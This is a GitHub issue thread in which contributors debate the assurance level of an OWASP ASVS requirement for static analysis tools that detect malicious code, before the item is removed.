jmanico
commented
2 years ago | 10.1.1 | Verify that a code analysis tool is in use that can detect potentially malicious code, such as time functions, unsafe file operations and network connections. |
|---|
Closed jmanico closed 1 year ago
jmanico
commented
2 years ago | 10.1.1 | Verify that a code analysis tool is in use that can detect potentially malicious code, such as time functions, unsafe file operations and network connections. |
|---|
elarlang
commented
2 years ago for me L3 seems more correct
mascotter
commented
2 years ago Taking into account development world moving more and more into DevOps and highlighting automation (also security-wise) I find it incomprehensible that a SAST tool is a requirement only for L3 i.e. "the most critical applications" as per definition in the ASVS.
If the penetration testable approach needs to be maintained for L1, how about putting the requirement 10.1.1 mandatory beginning from L2?
jmanico
commented
2 years ago Absolutely I agree this should be a level 1 or 2 requirement. Lack of a static analysis tool during development is close to security negligence these days. +1
vdbaan
commented
2 years ago I would make this a L2 requirement. L1 claims to be completely penetration testable and I would say that this requirement asks for attestation instead.
jmanico
commented
2 years ago We are dropping the "testing" designation for each ASVS level and are just moving it to risk levels. We may mimic MASVS where Level 1 is the low baseline for secure apps and level 2 is for advanced apps and drop the three levels.
So if the current three levels were risk levels, would that change your opinion?
Loosely today, level 1 is for public apps and provides low security, level 2 is for sensitive apps and level 3 is for critical infrastructure....
vdbaan
commented
2 years ago I like to hear that the ASVS is moving to risk levels.
If that is the case I would recommend it for Level 1 Even a SAST that is not tuned optimally will provide insight. Perhaps add that the findings of SAST should be blocking from Level 2 onwards.
jmanico
commented
2 years ago I agree that using SAST should be a requirement at the most basic levels of ASVS. +1
vdbaan
commented
2 years ago I would like to clarify that the purpose of SAST for Level 1 is awareness, especially if the tool is not tuned for the application. For higher levels the tool needs to be tuned to reduce FP as those findings are more of a hindrance than help raise awareness.
Sjord
commented
2 years ago I agree that everyone should run SAST to detect security bugs. But is that what this requirement says?
that can detect potentially malicious code
Not security bugs, but actively malicious code.
vdbaan
commented
1 year ago This item has been removed as per #1507, the issue can be closed